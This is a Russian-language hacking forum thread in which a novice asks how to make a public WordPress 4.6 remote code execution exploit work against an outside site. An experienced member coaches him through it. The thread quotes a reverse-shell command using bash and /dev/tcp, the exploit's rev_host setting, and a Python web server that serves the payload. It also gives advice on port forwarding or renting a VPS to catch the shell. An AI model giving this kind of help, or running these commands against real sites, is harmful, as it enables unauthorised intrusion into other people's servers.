HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Помогите с эксплуатацией эксплойта
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.10.2020, 18:45
CryNet
Новичок
Регистрация: 09.10.2020
Сообщений: 11
С нами: 2944781

Репутация: 0
По умолчанию
Хочу проэксплуатировать WP 4.6 Remote Code Execution.
Сам сплойт: https://exploitbox.io/exploit/wordpress-rce-exploit.sh.
Есть сайт нужной версии, в системе есть netcat.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу в консоли какой-то HTML и просто всё подвисает, нет сообщения о неудачное эксплуатации и т.д. А рядом создаётся файл rce.txt с содержимым:
(sleep 3s && nohup bash -i >/dev/tcp/192.168.57.1/1337 0&1) &

Что я делаю не так и как правильно проэксплуатировать

Ага! Среди кучи HTML-я заметил это:
  • Listening on 0.0.0.0 1337
В скрипте я вписал свой IP rev_host="192.168.0.4", именно этот адресс указан в веб-морде роутера
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 10.10.2020, 23:04
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами: 9679729

Репутация: 171


По умолчанию
Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.
 
Ответить с цитированием

  #3  
Старый 11.10.2020, 18:52
CryNet
Новичок
Регистрация: 09.10.2020
Сообщений: 11
С нами: 2944781

Репутация: 0
По умолчанию
Цитата:

Pernat1y сказал(а):

Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.

Да. Сайт не из моей локали
 
Ответить с цитированием

  #4  
Старый 11.10.2020, 20:22
CryNet
Новичок
Регистрация: 09.10.2020
Сообщений: 11
С нами: 2944781

Репутация: 0
По умолчанию
Цитата:

Pernat1y сказал(а):

пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337)

А не подскажите по пробросу, я просто никогда этого не делал... Как правильно это сделать?
У меня сейчас так:

Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить

1337192.168.0.41337TCP или UDPВключеноИзменить

Я на правильном пути?
 
Ответить с цитированием

  #5  
Старый 11.10.2020, 22:21
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами: 9679729

Репутация: 171


По умолчанию
Цитата:

CryNet сказал(а):

Я на правильном пути?
Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.
 
Ответить с цитированием

  #6  
Старый 11.10.2020, 23:17
CryNet
Новичок
Регистрация: 09.10.2020
Сообщений: 11
С нами: 2944781

Репутация: 0
По умолчанию
Цитата:

Pernat1y сказал(а):

Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.

А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.
 
Ответить с цитированием

  #7  
Старый 12.10.2020, 00:15
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами: 9679729

Репутация: 171


По умолчанию
Цитата:

CryNet сказал(а):

А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.

Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.
 
Ответить с цитированием

  #8  
Старый 12.10.2020, 12:16
CryNet
Новичок
Регистрация: 09.10.2020
Сообщений: 11
С нами: 2944781

Репутация: 0
По умолчанию
Цитата:

Pernat1y сказал(а):

Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.

Не-е-е... та же ошибка...

Код:


Код:
Warning: Inverse name lookup failed for `0.0.5.57'
Listening on any address 43069
Сейчас проброс выглядит так:

Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить

1337192.168.0.41337TCP или UDPВключеноИзменить81192.168.0.481 TCP или UDPВключеноИзменить
 
Ответить с цитированием

  #9  
Старый 12.10.2020, 15:39
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
С нами: 9679729

Репутация: 171


По умолчанию
Цитата:

CryNet сказал(а):

`0.0.5.57'

Ничего не смущает?

Тебе в скрипте нужно поправить:

Код:
rev_host="192.168.57.1"
на твой внешний айпишник
И тут
Код:
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
заменить порт на 81.
 
Ответить с цитированием

  #10  
Старый 12.10.2020, 16:13
CryNet
Новичок
Регистрация: 09.10.2020
Сообщений: 11
С нами: 2944781

Репутация: 0
По умолчанию
Цитата:

Pernat1y сказал(а):

Ничего не смущает?

Тебе в скрипте нужно поправить:

Код:
rev_host="192.168.57.1"
на твой внешний айпишник
И тут
Код:
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
заменить порт на 81.

Та это я-то сделал. Результат тот же.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.